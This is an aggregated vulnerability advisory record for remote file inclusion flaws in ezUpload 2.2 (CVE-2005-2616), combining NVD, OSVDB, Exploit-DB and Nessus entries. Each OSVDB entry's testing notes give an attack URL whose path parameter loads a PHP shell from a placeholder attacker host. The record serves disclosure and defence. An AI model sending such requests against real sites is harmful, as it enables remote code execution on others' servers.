ID CVE-2005-2616 Type cve Reporter NVD Modified 2011-03-07T21:24:46
Description
Multiple PHP file include vulnerabilities in ezUpload 2.2 allow remote attackers to execute arbitrary code via the path parameter to (1) initialize.php, (2) customize.php, (3) form.php, or (4) index.php.
{"result": {"osvdb": [{"id": "OSVDB:18764", "type": "osvdb", "title": "ezUpload initialize.php path Variable Remote File Inclusion", "description": "## Vulnerability Description\nezUpload contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to initialize.php not properly sanitizing user input supplied to the path variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nezUpload contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to initialize.php not properly sanitizing user input supplied to the path variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[victim]/ezupload/initialize.php?path=http://[attacker]/phpshell?&\n## References:\nVendor URL: http://www.scriptscenter.com/?\nSecurity Tracker: 1014723\n[Secunia Advisory ID:16434](https://secuniaresearch.flexerasoftware.com/advisories/16434/)\n[Related OSVDB ID: 18765](https://vulners.com/osvdb/OSVDB:18765)\n[Related OSVDB ID: 18763](https://vulners.com/osvdb/OSVDB:18763)\n[Related OSVDB ID: 18766](https://vulners.com/osvdb/OSVDB:18766)\nPacket Storm: http://packetstorm.linuxsecurity.com/0508-exploits/ezuploadRemote.txt\nGeneric Exploit URL: http://www.securiteam.com/exploits/5JP0J15GKU.html\nFrSIRT Advisory: ADV-2005-1379\n[CVE-2005-2616](https://vulners.com/cve/CVE-2005-2616)\nBugtraq ID: 14534\n", "published": "2005-08-11T04:15:25", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://vulners.com/osvdb/OSVDB:18764", "cvelist": ["CVE-2005-2616"], "lastseen": "2017-04-28T13:20:15"}, {"id": "OSVDB:18765", "type": "osvdb", "title": "ezUpload customize.php path Variable Remote File Inclusion", "description": "## Vulnerability Description\nezUpload contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to customize.php not properly sanitizing user input supplied to the path variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nezUpload contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to customize.php not properly sanitizing user input supplied to the path variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[victim]/ezupload/customize.php?path=http://[attacker]/phpshell?&\n## References:\nVendor URL: http://www.scriptscenter.com/?\nSecurity Tracker: 1014723\n[Secunia Advisory ID:16434](https://secuniaresearch.flexerasoftware.com/advisories/16434/)\n[Related OSVDB ID: 18764](https://vulners.com/osvdb/OSVDB:18764)\n[Related OSVDB ID: 18763](https://vulners.com/osvdb/OSVDB:18763)\n[Related OSVDB ID: 18766](https://vulners.com/osvdb/OSVDB:18766)\nPacket Storm: http://packetstorm.linuxsecurity.com/0508-exploits/ezuploadRemote.txt\nGeneric Exploit URL: http://www.securiteam.com/exploits/5JP0J15GKU.html\nFrSIRT Advisory: ADV-2005-1379\n[CVE-2005-2616](https://vulners.com/cve/CVE-2005-2616)\nBugtraq ID: 14534\n", "published": "2005-08-11T04:15:25", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://vulners.com/osvdb/OSVDB:18765", "cvelist": ["CVE-2005-2616"], "lastseen": "2017-04-28T13:20:15"}, {"id": "OSVDB:18763", "type": "osvdb", "title": "ezUpload index.php path Variable Remote File Inclusion", "description": "## Vulnerability Description\nezUpload contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to index.php not properly sanitizing user input supplied to the path variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nezUpload contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to index.php not properly sanitizing user input supplied to the path variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[victim]/ezupload/index.php?path=http://[attacker]/phpshell?&\n## References:\nVendor URL: http://www.scriptscenter.com/ezupload/\nSecurity Tracker: 1014723\n[Secunia Advisory ID:16434](https://secuniaresearch.flexerasoftware.com/advisories/16434/)\n[Related OSVDB ID: 18764](https://vulners.com/osvdb/OSVDB:18764)\n[Related OSVDB ID: 18765](https://vulners.com/osvdb/OSVDB:18765)\n[Related OSVDB ID: 18766](https://vulners.com/osvdb/OSVDB:18766)\nPacket Storm: http://packetstorm.linuxsecurity.com/0508-exploits/ezuploadRemote.txt\nGeneric Exploit URL: http://www.securiteam.com/exploits/5JP0J15GKU.html\nFrSIRT Advisory: ADV-2005-1379\n[CVE-2005-2616](https://vulners.com/cve/CVE-2005-2616)\nBugtraq ID: 14534\n", "published": "2005-08-11T04:15:25", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://vulners.com/osvdb/OSVDB:18763", "cvelist": ["CVE-2005-2616"], "lastseen": "2017-04-28T13:20:15"}, {"id": "OSVDB:18766", "type": "osvdb", "title": "ezUpload form.php path Variable Remote File Inclusion", "description": "## Vulnerability Description\nezUpload contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to form.php not properly sanitizing user input supplied to the path variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nezUpload contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to form.php not properly sanitizing user input supplied to the path variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[victim]/ezupload/form.php?path=http://[attacker]/phpshell?&\n## References:\nVendor URL: http://www.scriptscenter.com/?\nSecurity Tracker: 1014723\n[Secunia Advisory ID:16434](https://secuniaresearch.flexerasoftware.com/advisories/16434/)\n[Related OSVDB ID: 18764](https://vulners.com/osvdb/OSVDB:18764)\n[Related OSVDB ID: 18765](https://vulners.com/osvdb/OSVDB:18765)\n[Related OSVDB ID: 18763](https://vulners.com/osvdb/OSVDB:18763)\nPacket Storm: http://packetstorm.linuxsecurity.com/0508-exploits/ezuploadRemote.txt\nGeneric Exploit URL: http://www.securiteam.com/exploits/5JP0J15GKU.html\nFrSIRT Advisory: ADV-2005-1379\n[CVE-2005-2616](https://vulners.com/cve/CVE-2005-2616)\nBugtraq ID: 14534\n", "published": "2005-08-11T04:15:25", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://vulners.com/osvdb/OSVDB:18766", "cvelist": ["CVE-2005-2616"], "lastseen": "2017-04-28T13:20:15"}], "exploitdb": [{"id": "EDB-ID:26140", "type": "exploitdb", "title": "ezUpload 2.2 index.php path Parameter Remote File Inclusion", "description": "ezUpload 2.2 index.php path Parameter Remote File Inclusion. CVE-2005-2616. Webapps exploit for php platform", "published": "2005-08-10T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/26140/", "cvelist": ["CVE-2005-2616"], "lastseen": "2016-02-03T02:56:04"}, {"id": "EDB-ID:26141", "type": "exploitdb", "title": "ezUpload 2.2 initialize.php path Parameter Remote File Inclusion", "description": "ezUpload 2.2 initialize.php path Parameter Remote File Inclusion. CVE-2005-2616. Webapps exploit for php platform", "published": "2005-08-10T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/26141/", "cvelist": ["CVE-2005-2616"], "lastseen": "2016-02-03T02:56:13"}, {"id": "EDB-ID:26142", "type": "exploitdb", "title": "ezUpload 2.2 customize.php path Parameter Remote File Inclusion", "description": "ezUpload 2.2 customize.php path Parameter Remote File Inclusion. CVE-2005-2616. Webapps exploit for php platform", "published": "2005-08-10T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/26142/", "cvelist": ["CVE-2005-2616"], "lastseen": "2016-02-03T02:56:21"}, {"id": "EDB-ID:26143", "type": "exploitdb", "title": "ezUpload 2.2 form.php path Parameter Remote File Inclusion", "description": "ezUpload 2.2 form.php path Parameter Remote File Inclusion. CVE-2005-2616 . Webapps exploit for php platform", "published": "2005-08-10T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/26143/", "cvelist": ["CVE-2005-2616"], "lastseen": "2016-02-03T02:56:29"}], "nessus": [{"id": "EZUPLOAD_PATH_FILE_INCLUDES.NASL", "type": "nessus", "title": "ezUpload <= 2.2 Multiple Remote Vulnerabilities (SQLi, RFI, LFI)", "description": "The remote host appears to be running ezUpload, a commercial upload script written in PHP. \n\nThe installed version of ezUpload allows remote attackers to control the 'path' and 'mode' parameters used when including PHP code in several scripts. By leveraging this flaw, an attacker may be able to view arbitrary files on the remote host and execute arbitrary PHP code, possibly taken from third-party hosts. Successful exploitation may depend on PHP's 'magic_quotes_gpc' and 'allow_url_fopen' settings. \n\nIn addition, it reportedly fails to sanitize input passed to various parameters in the search module before using it in database queries, which opens the application up to SQL injection as well as cross-site scripting attacks.", "published": "2005-08-10T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=19418", "cvelist": ["CVE-2005-4308", "CVE-2005-2616", "CVE-2005-4309"], "lastseen": "2016-09-26T17:23:37"}]}}